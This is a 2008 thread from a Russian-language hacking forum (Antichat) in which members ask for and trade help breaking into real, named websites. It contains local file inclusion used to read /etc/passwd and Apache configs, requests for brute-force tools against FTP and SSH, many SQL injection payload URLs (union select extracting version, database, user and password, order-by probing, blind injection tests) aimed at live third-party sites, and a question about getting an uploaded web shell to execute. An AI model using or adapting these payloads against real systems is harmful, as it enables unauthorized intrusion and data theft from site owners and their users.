ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.08.2008, 23:57
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
подцепил локальным инклудом файлы
/etc/passwd
etc/httpd/conf/httpd.conf
нашёл файл
phpinfo.php
из httpd.conf видно, что на хостинге есть ещё сайты. такая запись:
<VirtualHost *:80>
ServerAdmin mail@gmail.com
DocumentRoot /home/SITENAME/public_html
ServerName www.SITENAME.com
ServerAlias SITENAME.com
ErrorLog /dev/null
CustomLog /dev/null common
SetOutputFilter DEFLATE
DeflateFilterNote ratio
SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png)$ no-gzip dont-vary
SetEnvIfNoCase Request_URI \.(?:exe|t?gz|zip|bz2|sit|rar)$ no-gzip dont-vary
SetEnvIfNoCase Request_URI \.pdf$ no-gzip dont-vary
ExpiresActive On
<Directory /home/SITENAME/public_html>
AllowOverride All
ExpiresByType application/x-shockwave-flash A0
ExpiresByType text/javascript A2419200
ExpiresByType text/plain A2419200
ExpiresByType text/html A300
ExpiresByType text/css A2419200
ExpiresByType image/gif A2419200
ExpiresByType image/jpeg A2419200
ExpiresByType image/png A2419200
</Directory>
</VirtualHost>
но приинклудить из них ничего не получается. видимо, такие настройки.
логов не нашёл =/
Загружать никаких файлов туда нельзя.
что мне можно сделать, чтобы хакнуть этот сайт?
По поводу /etc/passwd, знаю что брутят по маске Логин:Логин фтп, ссх. Скажите пожалуйста, какими брутфорсами это можно провернуть, кроме Гидры, не дружу с ней. |
|
|
12.08.2008, 00:07
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544
Репутация:
1559
|
|
ServerName www.SITENAME.com
)
но приинклудить из них ничего не получается. видимо, такие настройки.
такого сайта нет вот и не получается проинклудить SITENAME.com )
|
|
|
|
12.08.2008, 00:18
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
Провел на форуме:
20113
Репутация:
1
|
|
нет нет. Это я изменил имя, дабы не светить сервер
|
|
|
|
12.08.2008, 00:58
|
|
Познающий
Регистрация: 01.02.2008
Сообщений: 53
Провел на форуме:
136161
Репутация:
5
|
|
http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(co ncat(version(),database(),password(0),user()))),6, 7,8,9/* кто знает как тут нарыть удалённый адрес для БД + можно там файлы посмотреть через иньекцию
|
|
|
|
12.08.2008, 02:38
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733
Репутация:
46
|
|
Не знал куда написать. Решил сюда.
Проблема с заливкой шелла. Шелл на holm.ru, но там есть пхп, поэтому он исполняется, а некопируется... Пробовал в .htaccess прописать AddType application/force-open .php - не помогло, как видите... на холме открывается загрузка файла, на сайте с инклюдом - каракули... Подскажите что путевое в htaccess прописать чтоб пахало  |
|
|
|
12.08.2008, 05:10
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
help:
http://www.world-art.ru/games/games.php?id=4575+or+1=1
есть иньекция ?
http://www.litprom.ru/text.phtml?storycode=1'
Последний раз редактировалось sabe; 12.08.2008 в 10:35..
|
|
|
|
12.08.2008, 08:11
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359'
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+order+by+5--
http://www.library.lg.ua/eng/spravka/client/table1.php?id=-359+union+select+1,2,3,4,5--
инъекция есть, но с раскруткой проблемы. подскажет кто?
|
|
|
|
12.08.2008, 09:16
|
|
Новичок
Регистрация: 20.06.2008
Сообщений: 8
Провел на форуме:
138846
Репутация:
21
|
|
http://www.world-art.ru/games/games.php?id=4575+or+1=1
инъекта нет
http://www.litprom.ru/text.phtml?storycode=1'
блинд скул
http://www.litprom.ru/text.phtml?storycode=-9999999991+union+select+1,2/*
http://www.litprom.ru/text.phtml?storycode=-9999999991+union+select+1/*
инъект есть, вывода нет
читай Blind Sql Inj
|
|
|
|
12.08.2008, 09:53
|
|
Участник форума
Регистрация: 09.08.2008
Сообщений: 139
Провел на форуме:
560332
Репутация:
15
|
|
Сообщение от sabe
help:
есть иньекция ?
http://www.world-art.ru/games/games.php?id=4575+or+1=1
Я не уверен, но разве в SQL инъекции когда подбирают кол-во полей , ставят or 1=1?
|
|
|
|
12.08.2008, 10:33
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Glazz
это определение.. )
base
наверно ты прав.. )
http://kinomob.info/system/thumb.php?img_id=1+union+select+version()--
http://kinomob.info/index.php?p=showforum&fid=1+union+select+1--
логический вывод - 5 версия, как получить вывод ?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
